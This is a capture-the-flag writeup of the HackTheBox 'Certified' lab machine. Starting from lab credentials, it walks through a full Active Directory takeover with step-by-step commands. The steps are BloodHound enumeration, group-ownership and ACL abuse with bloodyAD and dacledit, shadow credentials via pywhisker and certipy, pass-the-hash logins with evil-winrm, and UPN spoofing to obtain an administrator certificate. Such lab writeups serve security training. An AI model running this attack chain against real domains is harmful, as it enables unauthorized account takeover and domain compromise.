Certified HTB Writeup | HacktheBox

Achieved a full compromise of the Certified machine, demonstrating the power of leveraging misconfigurations and services in AD environments. This walkthrough is now live on my website, where I detail the entire process step-by-step to help others understand and replicate similar scenarios during penetration testing. Check it out to learn practical techniques and sharpen your skills!

Dec 14, 2024 - xone

Initial Scenario

We begin the engagement with valid credentials for the user Judith Mader in the domain certified.htb. These were obtained from an earlier stage of the assessment:

Username: judith.mader

Password: judith09

User Account: judith.mader (Low privilege)

Target: Escalate privileges to root on the machine.

Tools Utilized: nxc, bloodyAD, dacledit.py, pywhisker, Impacket scripts, and certipy.

Enumeration

Nmap Scan

An initial Nmap scan revealed several open ports on the domain controller (DC01):

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-11-22 17:02:33Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP over SSL
3268/tcp  open  ldap          Microsoft Global Catalog
3269/tcp  open  ssl/ldap      Microsoft Global Catalog over SSL
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open  mc-nmf        .NET Message Framing

Key observations:

Active Directory Indicators: Ports 88 (Kerberos), 389 (LDAP), and 445 (SMB) suggest the presence of a Windows domain controller.

SSL Certificates: The certificate details revealed the hostname DC01.certified.htb and additional domain information, confirming the target's role as a certificate authority.

SMB Signing: Nmap scripts indicated SMB signing is enabled and required, which may limit some SMB attack vectors.

Testing SMB Login

With the obtained credentials, SMB authentication was tested using nxc:

nxc smb $IP -u 'judith.mader' -p 'judith09'

Output:

SMB         10.10.11.41     445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.41     445    DC01             [+] certified.htb\judith.mader:judith09

The credentials were successfully authenticated against the SMB service, confirming low-privilege access to the domain.

LDAP Enumeration with BloodHound

To map the domain structure and discover potential attack paths, LDAP enumeration was conducted using nxc with BloodHound collection enabled:

nxc ldap dc01.certified.htb -u judith.mader -p judith09 --bloodhound --collection All --dns-tcp --dns-server 10.10.11.41

Output:

LDAP        10.10.11.41     389    DC01             [+] certified.htb\judith.mader:judith09
LDAP        10.10.11.41     389    DC01             Resolved collection methods: objectprops, session, localadmin, dcom, trusts, rdp, container, psremote, acl, group
LDAP        10.10.11.41     389    DC01             Done in 00M 33S
LDAP        10.10.11.41     389    DC01             Compressing output into /home/kali/.nxc/logs/DC01_10.10.11.41_2024-11-22_054454_bloodhound.zip

The output was successfully collected and compressed into a ZIP file, ready for BloodHound analysis.

BloodHound Analysis

The BloodHound graph revealed several key attack paths within the Active Directory environment:

Judith Mader's Permissions:
Judith Mader has WriteOwner permissions on the Management group.
Service Account (Management_SVC):
The Management_SVC account has GenericWrite permissions over the Management group.
CA_Operator Privilege:
The Management_SVC account has GenericAll permissions over the CA_Operator user.

User Privilege Escalation

1. Data Collection with nxc

Action: Enumerated Active Directory data and found that judith.mader could modify the “Management” group.
Details: Used BloodHound to analyze the data collected by nxc.

2. Setting Ownership

Used bloodyAD to set judith.mader as the owner of the “Management” group:

bloodyAD --host "$IP" -d "certified.htb" -u "judith.mader" -p "judith09" set owner Management judith.mader

3. Granting Write Permissions

Updated the group permissions with dacledit.py:

python3 dacledit.py -action 'write' -rights 'WriteMembers' -principal 'judith.mader' -target-dn 'CN=MANAGEMENT,CN=USERS,DC=CERTIFIED,DC=HTB' 'certified.htb'/'judith.mader':'judith09'

4. Adding to Management Group

Added judith.mader to the “Management” group:

bloodyAD --host $IP -d 'certified.htb' -u 'judith.mader' -p 'judith09' add groupMember "Management" "judith.mader"

5. Exploiting KeyCredentialLink

Used pywhisker to create a certificate for management_svc:

python3 pywhisker.py -d "certified.htb" -u "judith.mader" -p judith09 --target "management_svc" --action add

6. Obtaining a TGT

Generated a Kerberos TGT for management_svc:

python3 gettgtpkinit.py certified.htb/management_svc -cert-pfx /home/kali/HTB/Certified/pywhisker/pywhisker/loa78u6G.pfx -pfx-pass 2v752WSk3p8VJ1rYuYXT fuck.ccache

7. Recovering NT Hash

Extracted NT hash for management_svc using gettgtpkinit.py:

python3 getnthash.py certified.htb/management_svc -key XXXXXXX41f6e9b55f2ce52b9922f38bff7e293ac3989a0XXXXXXXXXXXX

8. Logging in with Evil-WinRM

Logged in as management_svc with Evil-WinRM:

evil-winrm -i $IP -u management_svc -H $NT-Hash #Use NT Hash

Root Privilege Escalation

1. Identifying GenericAll Rights

Discovered that management_svc had GenericAll rights over ca_operator.

2. Adding KeyCredential

Used certipy-ad to modify ca_operator KeyCredential:

certipy-ad shadow auto -u management_svc@certified.htb -hashes $NT-Hash -account ca_operator

3. Updating UPN of ca_operator

Updated the UPN (UserPrincipalName) of ca_operator to administrator:

certipy-ad account update -u management_svc@certified.htb -hashes $NT-Hash -user ca_operator  -upn administrator

4. Requesting Administrator Certificate

Requested a certificate for the administrator account using certipy-ad:

certipy-ad req -username ca_operator@certified.htb -hashes $NT-Hash -ca certified-DC01-CA -template CertifiedAuthentication

5. Restoring Original UPN

Restored ca_operator’s UPN to its original value:

certipy-ad account update -u management_svc@certified.htb -hashes $NT-Hash -user ca_operator  -upn ca_operator@certified.htb

6. Obtaining Administrator TGT

Authenticated as administrator with the new certificate:

certipy-ad auth -pfx administrator.pfx -domain certified.htb

7. Logging in as Administrator

Logged in with Evil-WinRM as administrator:

evil-winrm -u administrator -H $NT-Hash-1 -i $IP

Summary

Key Steps:

Abused AD misconfigurations to escalate privileges.
Exploited certificate services to gain access to the administrator account.

Result: Full compromise of the Certified machine.